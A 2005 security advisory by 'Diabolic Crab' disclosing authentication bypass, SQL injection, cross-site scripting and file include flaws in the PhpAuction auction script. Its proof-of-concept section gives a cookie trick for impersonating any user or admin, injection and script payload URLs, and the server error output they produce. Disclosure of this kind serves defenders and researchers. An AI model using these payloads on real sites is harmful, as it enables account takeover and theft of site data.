|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Thursday, 07 July 2005 15:14 |
 Dcrab "s Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
******************************
Get Dcrab"s Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: PhpAuction has Authentication Bypass, Multiple Sql injection, Cross Site Scripting and File Include vulnerabilities
Date: 8/07/2005
Vendor: PhpAuction
Vendor Website: http://www.phpauction.org
Vendor Status: Contacted but no reply
Summary: There are, Authentication Bypass, Multiple Sql injection, Cross Site Scripting and File Include vulnerabilities in PhpAuction.
Proof of Concept Exploits:
Authentication bypass
Set the cookie as follows,
Name: PHPAUCTION_RM_ID
VALUE: Id number of the user/admin you want to impersinate (you can get it from thier profile)
Access the website, and you"r instantly logged in as them ;)
/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category="SQL_INJECTION&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&seller=1&country=Afghanistan&ending=1&SortProperty=ends&type=2&action=search&go=GO%20%3E%3E
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/adsearch.php on line 33
/viewnews.php?id="SQL_INJECTION
Error: select * from PROSITE_news where id="SQL_INJECTION
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ""SQL_INJECTION" at line 1
/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>
Cross Site Scripting
/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>
Cross Site Scripting
/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159
Cross Site Scripting
/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>
Cross Site Scripting
/login.php?username=<script>alert(document.cookie)</script>
Cross Site Scripting
/viewnews.php?id=<script>alert(document.cookie)</script>
Cross Site Scripting
/phpauction-gpl-2.5/index.php?lan=../put/.inc.php/file/name/here
Warning: main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): failed to open stream: No such file or directory in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
Fatal error: main(): Failed opening required "/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php" (include_path=".:/usr/local/lib/php") in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
/phpauction-gpl-2.5/admin/index.php?lan=../put/.inc.php/file/name/here
Warning: main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php): failed to open stream: No such file or directory in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
Fatal error: main(): Failed opening required "/home/**********/********/public_html/phpauction-gpl-2.5/includes/messages.../put/.inc.php/file/name/here.inc.php" (include_path=".:/usr/local/lib/php") in /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/includes/messages.inc.php on line 34
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my soon to come out book on Secure coding with php.
|
